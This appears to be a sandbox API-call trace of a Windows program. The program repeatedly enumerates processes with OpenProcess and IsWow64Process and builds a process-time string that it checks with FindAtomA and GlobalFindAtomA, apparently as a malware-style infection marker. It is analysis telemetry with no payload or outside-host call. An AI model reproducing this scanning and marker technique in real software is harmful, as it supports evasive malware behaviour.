	[0111.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.302] CloseHandle (hObject=0x694) returned 1
	[0111.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.303] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.303] CloseHandle (hObject=0x694) returned 1
	[0111.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.303] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.303] CloseHandle (hObject=0x694) returned 1
	[0111.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.303] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.303] CloseHandle (hObject=0x694) returned 1
	[0111.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.304] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.304] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.304] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.304] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.305] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.305] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.305] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.305] CloseHandle (hObject=0x694) returned 1
	[0111.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.305] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.305] CloseHandle (hObject=0x694) returned 1
	[0111.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.306] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.306] CloseHandle (hObject=0x694) returned 1
	[0111.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.306] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.306] CloseHandle (hObject=0x694) returned 1
	[0111.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.357] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.357] CloseHandle (hObject=0x694) returned 1
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.358] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.358] CloseHandle (hObject=0x694) returned 1
	[0111.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.358] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.358] CloseHandle (hObject=0x694) returned 1
	[0111.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.358] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.358] CloseHandle (hObject=0x694) returned 1
	[0111.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.358] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.359] CloseHandle (hObject=0x694) returned 1
	[0111.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.359] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.359] CloseHandle (hObject=0x694) returned 1
	[0111.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.359] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.359] CloseHandle (hObject=0x694) returned 1
	[0111.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.359] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.359] CloseHandle (hObject=0x694) returned 1
	[0111.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.360] CloseHandle (hObject=0x694) returned 1
	[0111.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.360] CloseHandle (hObject=0x694) returned 1
	[0111.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.360] CloseHandle (hObject=0x694) returned 1
	[0111.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.360] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.360] CloseHandle (hObject=0x694) returned 1
	[0111.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.361] CloseHandle (hObject=0x694) returned 1
	[0111.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.361] CloseHandle (hObject=0x694) returned 1
	[0111.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.361] CloseHandle (hObject=0x694) returned 1
	[0111.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.361] CloseHandle (hObject=0x694) returned 1
	[0111.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.361] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.361] CloseHandle (hObject=0x694) returned 1
	[0111.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.362] CloseHandle (hObject=0x694) returned 1
	[0111.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.362] CloseHandle (hObject=0x694) returned 1
	[0111.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.362] CloseHandle (hObject=0x694) returned 1
	[0111.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.362] CloseHandle (hObject=0x694) returned 1
	[0111.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.362] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.362] CloseHandle (hObject=0x694) returned 1
	[0111.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.363] CloseHandle (hObject=0x694) returned 1
	[0111.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.363] CloseHandle (hObject=0x694) returned 1
	[0111.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.363] CloseHandle (hObject=0x694) returned 1
	[0111.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.363] CloseHandle (hObject=0x694) returned 1
	[0111.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.363] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.364] CloseHandle (hObject=0x694) returned 1
	[0111.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.364] CloseHandle (hObject=0x694) returned 1
	[0111.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.364] CloseHandle (hObject=0x694) returned 1
	[0111.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.364] CloseHandle (hObject=0x694) returned 1
	[0111.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.364] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.364] CloseHandle (hObject=0x694) returned 1
	[0111.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.365] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.365] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.365] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.365] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.366] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.366] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.366] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.366] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0111.366] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0111.366] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.366] CloseHandle (hObject=0x694) returned 1
	[0111.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.367] CloseHandle (hObject=0x694) returned 1
	[0111.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.367] CloseHandle (hObject=0x694) returned 1
	[0111.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.367] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.367] CloseHandle (hObject=0x694) returned 1
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.418] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.418] CloseHandle (hObject=0x694) returned 1
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.418] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.418] CloseHandle (hObject=0x694) returned 1
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.418] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.419] CloseHandle (hObject=0x694) returned 1
	[0111.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.419] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.419] CloseHandle (hObject=0x694) returned 1
	[0111.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.419] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.419] CloseHandle (hObject=0x694) returned 1
	[0111.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.419] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.419] CloseHandle (hObject=0x694) returned 1
	[0111.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.420] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.420] CloseHandle (hObject=0x694) returned 1
	[0111.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.420] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.420] CloseHandle (hObject=0x694) returned 1
	[0111.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.420] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.420] CloseHandle (hObject=0x694) returned 1
	[0111.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.420] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.420] CloseHandle (hObject=0x694) returned 1
	[0111.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.421] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.421] CloseHandle (hObject=0x694) returned 1
	[0111.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.421] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.421] CloseHandle (hObject=0x694) returned 1
	[0111.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.421] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.421] CloseHandle (hObject=0x694) returned 1
	[0111.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.421] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.421] CloseHandle (hObject=0x694) returned 1
	[0111.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.422] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.422] CloseHandle (hObject=0x694) returned 1
	[0111.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.422] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.422] CloseHandle (hObject=0x694) returned 1
	[0111.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.422] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.422] CloseHandle (hObject=0x694) returned 1
	[0111.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.422] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.422] CloseHandle (hObject=0x694) returned 1
	[0111.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.422] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.422] CloseHandle (hObject=0x694) returned 1
	[0111.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.423] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.423] CloseHandle (hObject=0x694) returned 1
	[0111.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0111.423] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.423] CloseHandle (hObject=0x694) returned 1
	[0111.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0111.423] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.423] CloseHandle (hObject=0x694) returned 1
	[0111.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0111.423] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.423] CloseHandle (hObject=0x694) returned 1
	[0111.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0111.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.424] CloseHandle (hObject=0x694) returned 1
	[0111.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0111.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.424] CloseHandle (hObject=0x694) returned 1
	[0111.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0111.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.424] CloseHandle (hObject=0x694) returned 1
	[0111.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0111.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.424] CloseHandle (hObject=0x694) returned 1
	[0111.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0111.424] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.424] CloseHandle (hObject=0x694) returned 1
	[0111.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0111.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.425] CloseHandle (hObject=0x694) returned 1
	[0111.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0111.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.425] CloseHandle (hObject=0x694) returned 1
	[0111.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.425] CloseHandle (hObject=0x694) returned 1
	[0111.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0111.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.426] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0111.426] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0111.426] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0111.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.427] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0111.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0111.427] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
